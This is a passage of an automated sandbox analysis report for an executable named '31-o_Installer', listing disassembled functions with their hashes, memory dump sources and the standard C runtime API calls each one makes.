                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                • String ID: csm$csm
                • API String ID: 2163707966-3733052814
                • Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                • Instruction ID: 234969a8c3e70d9b5859dae037ccea8d2d35284a73e361ef2228526c2fd4d2cb
                • Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                • Instruction Fuzzy Hash: 5A01423101510ABBDF22AF50EC42EAA7F6AFF08358F244410FD5915121D7329AB1EFA0
                APIs
                • _malloc.LIBCMT ref: 0026DE76
                  • Part of subcall function 0026729E: __FF_MSGBANNER.LIBCMT ref: 002672B7
                  • Part of subcall function 0026729E: __NMSG_WRITE.LIBCMT ref: 002672BE
                  • Part of subcall function 0026729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,002663C9,00000000,00000001,00000000,?,0026B742,00000018,0027D728,0000000C,0026B7D2), ref: 002672E3
                • _free.LIBCMT ref: 0026DE89
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: c206866f528cdbf3c98229ee44c4ed78264d7313e04fd75c629bc8280a1e02bc
                • Instruction ID: d58cb21df3d17c01f651340340b2024b9865021530ea5d27b3a22da174780edb
                • Opcode Fuzzy Hash: c206866f528cdbf3c98229ee44c4ed78264d7313e04fd75c629bc8280a1e02bc
                • Instruction Fuzzy Hash: 7D11A732E3561AABCB217F74AC09A5A3795AF503B0B314426F89DAF151DE7188F08E91
                APIs
                • __getptd.LIBCMT ref: 0026D9B1
                  • Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
                  • Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC
                • __getptd.LIBCMT ref: 0026D9C8
                • __amsg_exit.LIBCMT ref: 0026D9D6
                • __lock.LIBCMT ref: 0026D9E6
                • __updatetlocinfoEx_nolock.LIBCMT ref: 0026D9FA
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                • String ID:
                • API String ID: 938513278-0
                • Opcode ID: f2687e1fe13eed3c4bf719f6251434fc4a4021e774016ff06440763158652f38
                • Instruction ID: 70e9c13d73b0e8bb0e876330c51549c9f3d4d413da7d4a3f804dbd6859969556
                • Opcode Fuzzy Hash: f2687e1fe13eed3c4bf719f6251434fc4a4021e774016ff06440763158652f38
                • Instruction Fuzzy Hash: A3F09032E766199EDF22BF789807B5E73A0AF04720F15410AF418A71C2CB7458E08F96
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4cb7e77362d6674df5be20d237d2e75d97a73f7d96d19382904869181d562428
                • Instruction ID: 606dadbfd294587343573b881e78c12d35318597fceb8dbf0d1433c8ae8d7895
                • Opcode Fuzzy Hash: 4cb7e77362d6674df5be20d237d2e75d97a73f7d96d19382904869181d562428
                • Instruction Fuzzy Hash: 7B517375910A09DFCF15DFA8C9819AEB7F9FF08314B10056EE542A7641D770AE98CB50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                • String ID:
                • API String ID: 2782032738-0
                • Opcode ID: be099eb3870236c6dd2aadf504d5ef235c77f619fd41c052ede7db86fa8fa48e
                • Instruction ID: 1ba62af85a12a4085fcfc4fb309f32fbeccbe6a0e5a3b8f2b27c4a29b6f00f85
                • Opcode Fuzzy Hash: be099eb3870236c6dd2aadf504d5ef235c77f619fd41c052ede7db86fa8fa48e
                • Instruction Fuzzy Hash: DF41B531A20B259FDB249F69C84969EBBB6AF80360F64852DE45697180D770DDE1CB40
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00273C19
                • __isleadbyte_l.LIBCMT ref: 00273C4C
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00273C7D
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00273CEB
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 37b564aed1e2170f536935961cc07746a57e2a0679eb6c6c73b115f235917ae6
                • Instruction ID: 7686f4175956632bb0458713768556cfb23950fe54bb93d96966731eac15587a
                • Opcode Fuzzy Hash: 37b564aed1e2170f536935961cc07746a57e2a0679eb6c6c73b115f235917ae6
                • Instruction Fuzzy Hash: 2A31E531A21296EFCB12DF64CC85AB97BB5BF00310F15C56EE069AB191D730DEA0EB50
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction ID: f26f85fe29bbd64f666d106afb2a0250012dde2b855e10c25d9344d77766fb9e
                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                • Instruction Fuzzy Hash: B8114E7602014EBBCF165F88CC45CEE3F2ABB59394B688556FE1859031DB36C9F1AB81
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: _wprintf
                • String ID:
                • API String ID: 2738768116-0
                • Opcode ID: dca0ec3a925c848095cdd86018a67ec393229e59f9fde57faa3eb7a1cd91c1be
                • Instruction ID: f1f6b6e95c88d63492dd41669365ef23cd2695da17f9b23385db819abb5dec1b
                • Opcode Fuzzy Hash: dca0ec3a925c848095cdd86018a67ec393229e59f9fde57faa3eb7a1cd91c1be
                • Instruction Fuzzy Hash: 61F03727D7923129953C31A6A44EE879F08EB03BF47391066BCCCA11D1599158F185D9
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 002635E5
                  • Part of subcall function 002638C7: std::exception::exception.LIBCMT ref: 002638DC
                  • Part of subcall function 002638C7: __CxxThrowException@8.LIBCMT ref: 002638F1
                  • Part of subcall function 00262279: std::_Xinvalid_argument.LIBCPMT ref: 0026228A
                • _memmove.LIBCMT ref: 00263640
                Strings
                • invalid string position, xrefs: 002635E0
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
                • String ID: invalid string position
                • API String ID: 1253240057-1799206989
                • Opcode ID: 8ee2cfe0e9d89d3644a68b6954e02626328422183d3908979db3e5f4c17c8485
                • Instruction ID: 1f36bae930cd47a11dce5b3616cba1f45d58d32f46b599f4670075ee1a4e19f1
                • Opcode Fuzzy Hash: 8ee2cfe0e9d89d3644a68b6954e02626328422183d3908979db3e5f4c17c8485
                • Instruction Fuzzy Hash: 5C11C832324210ABDB24DE1CD851A5AB3ADEB95720F10052DF91687381CBB1DBE1C799
                APIs
                • std::_Xinvalid_argument.LIBCPMT ref: 00262171
                  • Part of subcall function 002638C7: std::exception::exception.LIBCMT ref: 002638DC
                  • Part of subcall function 002638C7: __CxxThrowException@8.LIBCMT ref: 002638F1
                • _memmove.LIBCMT ref: 002621AA
                Strings
                • invalid string position, xrefs: 0026216C
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: Exception@8ThrowXinvalid_argument_memmovestd::_std::exception::exception
                • String ID: invalid string position
                • API String ID: 22950630-1799206989
                • Opcode ID: df31cc2210c363fd663345982afa4b8484ec9fb2eab8ddc69fe931704cc6d81e
                • Instruction ID: 9cd38755169cb000f4c6141889aed09a8ffa16d91e2894d23d552476cd6837ed
                • Opcode Fuzzy Hash: df31cc2210c363fd663345982afa4b8484ec9fb2eab8ddc69fe931704cc6d81e
                • Instruction Fuzzy Hash: 0B01F931724A41DBD3249E68CCC0916B3AAE7827103204D7CE58587642DBB4ECD987A0
                APIs
                • _strcpy_s.LIBCMT ref: 002667F4
                • __invoke_watson.LIBCMT ref: 00266848
                  • Part of subcall function 00266683: _strcat_s.LIBCMT ref: 002666A2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: __invoke_watson_strcat_s_strcpy_s
                • String ID: &k&
                • API String ID: 312943863-2542130385
                • Opcode ID: 1573c7a8119fdefa43e5e2cf26635de50da048c9222d08e7718ef4f258c85d5d
                • Instruction ID: 3ac38bf7be485d874f4efb86e9195a446e2391c0a82f6e4ed56cca0ee9218c13
                • Opcode Fuzzy Hash: 1573c7a8119fdefa43e5e2cf26635de50da048c9222d08e7718ef4f258c85d5d
                • Instruction Fuzzy Hash: C6F0F0B24203497BDF116EA0CC4AEDB3F5DAF01310F488061FA196A012E7329EB4CBA1
                APIs
                  • Part of subcall function 00264895: __getptd.LIBCMT ref: 0026489B
                  • Part of subcall function 00264895: __getptd.LIBCMT ref: 002648AB
                • __getptd.LIBCMT ref: 00267AC8
                  • Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
                  • Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC
                • __getptd.LIBCMT ref: 00267AD6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                • Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                • Opcode ID: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                • Instruction ID: d78bd3ed5e1c950878e06509f8c3a16ce046dbf5edf1ec5a77987d985e803ce0
                • Opcode Fuzzy Hash: 9be489d9b2c9357c481f46e0d1185517e740e94918750dde5ba21505126bd088
                • Instruction Fuzzy Hash: 28014B398252068BCF399F36E888ABDB3B5EF24319F28482DE05156661CB3089E0CF01